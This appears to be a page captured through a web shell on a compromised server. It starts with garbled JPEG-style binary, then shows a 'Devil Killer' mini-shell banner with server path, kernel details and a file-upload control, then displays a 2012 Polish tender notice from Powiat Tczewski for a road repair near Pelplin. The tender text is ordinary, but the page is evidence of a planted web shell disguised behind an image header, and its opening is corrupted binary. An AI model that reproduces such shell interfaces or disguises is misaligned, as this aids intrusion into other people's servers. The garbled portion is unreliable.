JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120413/84555-N-2012.html

<p class="kh_header"><b>Tczew: REMONT DROGI POWIATOWEJ NR 2820G PELPLIN - KULICE - NOWA CERKIEW</b><br>
<b>Numer ogłoszenia: 84555 - 2012; data zamieszczenia: 13.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Tczewski , ul. Piaskowa 2, 83-110 Tczew, woj. pomorskie, tel. 58 7734 800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.tczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT DROGI POWIATOWEJ NR 2820G PELPLIN - KULICE - NOWA CERKIEW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Przedmiotem zamówienia jest wykonanie remontu drogi powiatowej nr 2820G Pelplin - Kulice - Nowa Cerkiew, na odcinku około 800 m we wsi Nowa Cerkiew w ramach zadania inwestycyjnego pn. Remont drogi powiatowej Nr 2820G Pelplin - Kulice - Nowa Cerkiew. 
2.2 	Zakres dotyczy wykonania przez Powiat Tczewski robót budowlanych branży drogowej polegających na poszerzeniu jezdni do 6,0 m i wykonaniu nowej nawierzchni asfaltowej, z wyłączeniem zakresu robót realizowanych na działkach (gminnych)  Nr 116/6 i 116/3, pełnego zakresu robót branży elektrycznej polegających na usunięciu kolizji występującego uzbrojenia z nowym rozwiązaniem drogowym oraz pełnego zakresu robót kanalizacji deszczowej. 
Gmina Morzeszczyn wykona roboty budowlane branży drogowej na działkach Nr 116/6 i 116/3. 
2.3 Zakres planowanych prac budowlanych obejmuje branże:
2.3.1	drogową: 
- prace rozbiórkowe - frezowanie istniejącej nawierzchni bitumicznej,
- wykonanie nowej konstrukcji pod poszerzenie o 2,5m, 
- wykonanie nowej nawierzchni asfaltowej, 
- budowa chodników i pasów postojowych z betonowej kostki brukowej,
- przebudowa istniejących i budowa nowych zjazdów na posesje z betonowej kostki brukowej,
- oznakowanie pionowe i poziome jezdni,
- wykonanie trawników na skarpach,
2.3.2 elektryczną: 
- przebudowa linii napowietrznej nn 0,4kV dł. 0,114km - usunięcie kolizji z projektowaną drogą,
2.3.3 sanitarną: 
- wykonanie kanalizacji deszczowej, 
- montaż urządzeń oczyszczających wody opadowe.  
2.4  W związku z przyjętym rozliczeniem ryczałtowym Zamawiający informuje, że wszystkie przedmiary robót udostępnione wraz z dokumentacją projektową należy traktować w sposób orientacyjny i pomocniczy. Stanowią one część składową opisu przedmiotu zamówienia i nie mogą być dla Wykonawcy jedyną podstawą do obliczenia ceny oferty. W celu złożenia prawidłowej oferty Wykonawca  powinien uwzględnić dane zawarte w SIWZ w poszczególnych dokumentacjach, kolejno wg stopnia ważności: projekty budowlane, projekty wykonawcze, Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych z uwzględnieniem niniejszego zastrzeżenia.
2.5 	W związku z art. 30 ust. 4 i 5 Ustawy i faktem, iż Zamawiający dokonał opisu przedmiotu zamówienia m.in. poprzez normy, certyfikaty oraz wymaganą przepisami Specyfikację Techniczną Wykonania i Odbioru Robót Budowlanych i systemy odniesienia, Zamawiający dopuszcza zastosowanie rozwiązań równoważnych w stosunku do opisywanych. Wykonawca natomiast zobowiązany jest do zastosowania rozwiązań równoważnych co do ich cech i parametrów, przy czym rozwiązania te muszą oznaczać stosowanie rozwiązań nie gorszych niż rozwiązania, które są opisane przez Zamawiającego.
Zastosowanie rozwiązań równoważnych musi gwarantować wykonanie konkretnie zaprojektowanych rozwiązań projektowych, które projekt realizuje, a ich zastosowanie musi zapewnić kompatybilność z zastosowanymi urządzeniami, wyrobami i technologią.
2.6	Zaleca się dokonanie wizji lokalnej w miejscu planowanych robót budowlanych dla prawidłowego przygotowania oferty i realizacji zamówienia.
2.7	Szczegółowy zakres robót zawarty jest w niżej wymienionej dokumentacji projektowej autorstwa jednostki projektowej HLB Projektowanie i Nadzory Budowlane Henryk Baniecki, Szpęgawa,  ul. Bukowa 11.  
2.8	Wykaz dokumentacji projektowej (uszczegółowionej) stanowiącej opis przedmiotu zamówienia:
2.8.1	Projekt budowlany  - branża drogowa,
2.8.2	Projekt wykonawczy  - branża drogowa,
2.8.3	Projekt budowlany  - branża sanitarna - Odwodnienie drogi,
2.8.4	Projekt wykonawczy  - branża sanitarna - Odwodnienie drogi,
2.8.5	Projekt budowlano-wykonawczy - Elektroenergetyka,
2.8.6	Specyfikacja techniczna wykonania i odbioru robót budowlanych - branża drogowa,  branża sanitarna (kanalizacja deszczowa) i branża elektryczna,
2.8.7	Przedmiar  robót branży drogowej,
2.8.8	Przedmiar  robót branży sanitarnej - odwodnienie,
2.8.9	Przedmiar  robót branży elektrycznej - elektroenergetyka.
2.9 	Warunki prowadzenia robót:
a) 	Wymagania   dotyczące   zasad   prowadzenia   robót  i  realizacji  budowy  podają            Specyfikacje  Techniczne  Wykonania  i  Odbioru  Robót  Budowlanych  w  podziale na branże: drogową, sanitarną i  elektryczną.
b)	Zamówienie będzie realizowane zgodnie z harmonogramem rzeczowo-      finansowym robót sporządzonym przez  Wykonawcę i przedłożonym do akceptacji Zamawiającemu.
c)	Wykonawca jest zobowiązany do właściwego i zgodnego z projektem organizacji ruchu drogowego na czas prowadzenia robót zabezpieczenia terenu budowy. 
d)	Wykonawca musi posiadać lub dysponować miejscem z pozwoleniem na utylizację materiałów rozbiórkowych dla: 
- materiałów bitumicznych,
- gruzu z betonu cementowego,
- mas ziemnych.       
2.10		Ponadto do obowiązków Wykonawcy, w ramach ustalonego wynagrodzenia ryczałtowego za    przedmiot niniejszego zamówienia, należy:
2.10.1	Wykonanie wszystkich robót towarzyszących wynikających z technologii robót;
2.10.2	Zabezpieczenie placu budowy w sposób trwały i wyraźny przed osobami trzecimi także w czasie przerw technologicznych, ustalenie stałego nadzoru osobowego w miejscach zagrożenia wypadkiem osób przypadkowych;
2.10.3	Zabezpieczenie i oznakowanie własnym kosztem i staraniem placu budowy;
2.10.4	Wykonanie pomiarów wykonawczych i powykonawczych, wymaganych odpowiednimi przepisami;
2.10.5	Założenie podliczników do rozliczania kosztów zużycia wody na czas trwania robót budowlanych oraz ponoszenie kosztów związanych ze zużyciem  wody w trakcie trwania robót;
2.10.6	Doprowadzenie terenów udostępnionych na czas prowadzenia robót budowlanych przez użytkowników tych terenów do stanu w jakim je przejmował;
2.10.7	Wykonywanie niezbędnych badań w celu udokumentowania odpowiedniej jakości i parametrów wykonania prac.  
2.11	ZASTRZEŻENIE
2.11.1	Zamawiający zastrzega sobie prawo dysponowania nieruchomością, na której prowadzone będą roboty budowlane w uzgodnieniu z Wykonawcą robót.
2.11.2	W przypadku zatrudnienia podwykonawców, Wykonawca będzie ponosił pełną odpowiedzialność wobec Zamawiającego i osób trzecich za działania i zaniechania podwykonawców, jak również za jakość wykonanych przez nich robót.
2.11.3	Wykonawca udziela pisemnej gwarancji jakości na przedmiot umowy - na okres 36 miesięcy, licząc od dnia odbioru końcowego przedmiotu umowy.
2.11.4	Zamawiającemu przysługuje rękojmia za wady przedmiotu umowy - na okres 36 miesięcy, licząc od dnia odbioru końcowego przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających w trybie art. 67 ust. 1 pkt. 6 ustawy Pzp do wysokości 20% wartości zamówienia podstawowego w branżach: drogowej, elektrycznej i sanitarnej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1	Warunkiem udziału w postępowaniu jest wniesienie wadium na kwotę 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100).
8.2	Wadium musi być wniesione przed upływem terminu do składania ofert, wskazanego w punkcie 11.1 SIWZ.
8.3	Wadium może być wnoszone w następujących formach: 
8.3.1 pieniądzu, 
8.3.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
8.3.3 gwarancjach bankowych, 
8.3.4 gwarancjach ubezpieczeniowych,
8.3.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275 ze zm.).
8.4	Jeżeli wadium zostanie wniesione w pieniądzu, to należy je wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Tczewie 15 8345 0006 0000 0954 2000 0064. Wykonawca powinien dołączyć do oferty kserokopię wniesienia wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Wadium - przetarg na: dotyczy postępowania nr ZP.272.7.2012. W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego, który należy złożyć łącznie z ofertą. Dokumenty potwierdzające wniesienie wadium, o których mowa w punkcie 8.3, muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
8.5	W przypadku wnoszenia wadium w formie innej niż w pieniądzu, w treści tego dokumentu powinna znaleźć się treść art. 46 ust. 4a i 5 ustawy określająca okoliczności zatrzymania wadium przez Zamawiającego (brak tej treści w dokumencie będzie skutkować odrzuceniem oferty). Poza tym z powyższego dokumentu powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie.
8.6	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany w punkcie 8.4 SIWZ.
8.7	Okoliczności i zasady zwrotu wadium, jego przepadku określa Ustawa.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych innych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.3	Zamawiający oceni czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:
4.3.1 Wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną o rodzaju i wartości niżej opisanych: 
a)	rodzaj każdej roboty budowlanej - budowa  i/lub  przebudowa i/lub modernizacja i/lub remont drogi klasy co najmniej Z, zawierającej elementy sieciowe/branżowe, w szczególności z zakresu branży: drogowej, sanitarnej i elektrycznej/elektroenergetycznej z oświetleniem,
b)	wartość każdej roboty budowlanej - nie mniej niż 2 000 000,00 zł brutto (słownie: dwa miliony złotych brutto)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.3	Zamawiający oceni czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:
Dysponuje narzędziami, wyposażeniem zakładu i urządzeniami technicznymi niezbędnymi w celu realizacji zamówienia, takimi jak:
- koparki samobieżne jednonaczyniowe (0,6 ¸ 1,2m3) - min. 2 szt.
- walec statyczny samojezdny - min.  1 szt,
- walec statyczny samojezdny ogumiony (10¸15t)  - min. 1 szt , 
- walec wibracyjny samojezdny (stalowy tandem 8¸12t) - min.1 szt. ,
- zagęszczarka płytowa (200¸ 500kg) - min.2 szt.
- skrapiarka do bitumu -  min.1 szt.
- szczotka mechaniczna- min.1 szt.
- samochód samowyładowczy wyposażony w pokrowce brezentowe -min. 1szt
- rozściełacz mieszanki mineralno-bitumicznej z pełną automatyzacją sterowania procesem układania o szer. stołu roboczego 3¸ 6 m - min. 1 zestaw,
- wytwórnia  (otaczarki) o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek mineralno-asfaltowych.
UWAGA: 	Wykonawca może zaoferować alternatywny, porównywalny technicznie sprzęt dla prawidłowego wykonania danych robót. W przypadku zaoferowania zastosowania sprzętu porównywalnego technicznie do ww. sprzętu - Wykonawca musi wykazać ową porównywalność w ofercie. Stwierdzenie przez Zamawiającego braku porównywalności zaoferowanego sprzętu z ww. sprzętem, będzie to skutkowało odrzuceniem jego oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.3	Zamawiający oceni czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:

4.3.3 Dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj.:
a) 	1 osoby na stanowisko kierownika budowy/kierownika robót drogowych w specjalności (branży) drogowej posiadającej:
     - 	stosowne uprawnienia/dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej, obejmującej kierowanie robotami budowlanymi w specjalności (branży) drogowej w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
     - 	co najmniej 3 lata doświadczenia zawodowego w specjalności (branży) drogowej na stanowisku kierownika budowy lub kierownika robót przy realizacji robót budowlanych;
b) 	1 osoby na stanowisko kierownika robót w specjalności (branży) sanitarnej posiadającej:
     - 	uprawnienia/ dokumenty, które upoważniają do pełnienia  samodzielnej funkcji technicznej obejmującej kierowanie robotami w specjalności (branży) sanitarnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych, zgodnie z obowiązującymi przepisami prawa,
     - 	co najmniej 1 rok doświadczenia zawodowego w specjalności (branży) sanitarnej na stanowisku kierownika robót lub kierownika budowy przy realizacji robót budowlanych;
c) 1 osoby na stanowisko kierownika robót w specjalności (branży) elektrycznej posiadającej:
- uprawnienia/dokumenty, które upoważniają do pełnienia samodzielnej funkcji technicznej obejmującej kierowanie robotami w specjalności (branży) elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z obowiązującymi przepisami prawa,
- co najmniej 1 rok doświadczenia zawodowego w specjalności (branży) elektrycznej na stanowisku kierownika robót lub kierownika budowy przy realizacji robót budowlanych;
d) 1 osoby na stanowisku geodety posiadającej:
-  uprawnienia/dokumenty, które upoważniają do sprawowania samodzielnej funkcji w dziedzinie geodezji w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa,
 - co najmniej 1 rok doświadczenia zawodowego w branży geodezyjnej na stanowisku geodety z uprawnieniami/dokumentami, które upoważniają do sprawowania samodzielnej funkcji w dziedzinie geodezji w zakresie niezbędnym do realizacji przedmiotu zamówienia, zgodnie z obowiązującymi przepisami prawa, przy realizacji robót budowlanych drogowych.
Przez wymagane doświadczenie zawodowe na danym stanowisku należy rozumieć lata czynnie przepracowane na danym stanowisku przy realizacji robót budowlanych w danej specjalności (branży). 
Niniejsze oznacza, iż np.: 
- 	osoba na stanowisko kierownika budowy w specjalności (branży) drogowej musi posiadać doświadczenie w tej specjalności (branży) na stanowisku kierownika budowy lub kierownika robót specjalności (branży) drogowej przy realizacji roboty budowlanej/robót budowlanych w ramach zamówienia/zamówień w łącznym okresie co najmniej 3 lat*. 
- 	osoba na stanowisko kierownika robót w specjalności (branży) sanitarnej musi posiadać doświadczenie w tej specjalności (branży) na stanowisku kierownika budowy lub kierownika robót specjalności (branży) sanitarnej przy realizacji roboty budowlanej/robót budowlanych w ramach zamówienia/zamówień w łącznym okresie co najmniej 1 roku*. 
* Wymagania dot. doświadczenia kierownika robót w specjalności (branży) elektrycznej należy rozumieć analogicznie, jak dla kierownika robót sanitarnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.3	Zamawiający oceni czy Wykonawca spełnia warunki, o których mowa w pkt 4.1 SIWZ, jeżeli wykaże, że:

4.3.4 Dysponuje lub posiada dostęp do środków finansowych lub kredytowych w kwocie co najmniej 1 000 000,00 PLN (słownie: jeden milion złotych).
4.3.5 	Posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej  1 000 000,00 PLN (słownie: jeden milion złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.1.9	Pisemne zobowiązania innych podmiotów do udostępnienia zasobów niezbędnych do realizacji zamówienia, jeżeli Wykonawca, wskazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy, polegał będzie na zasobach tych podmiotów na zasadach określonych w art. 26 ust. 2b Ustawy.
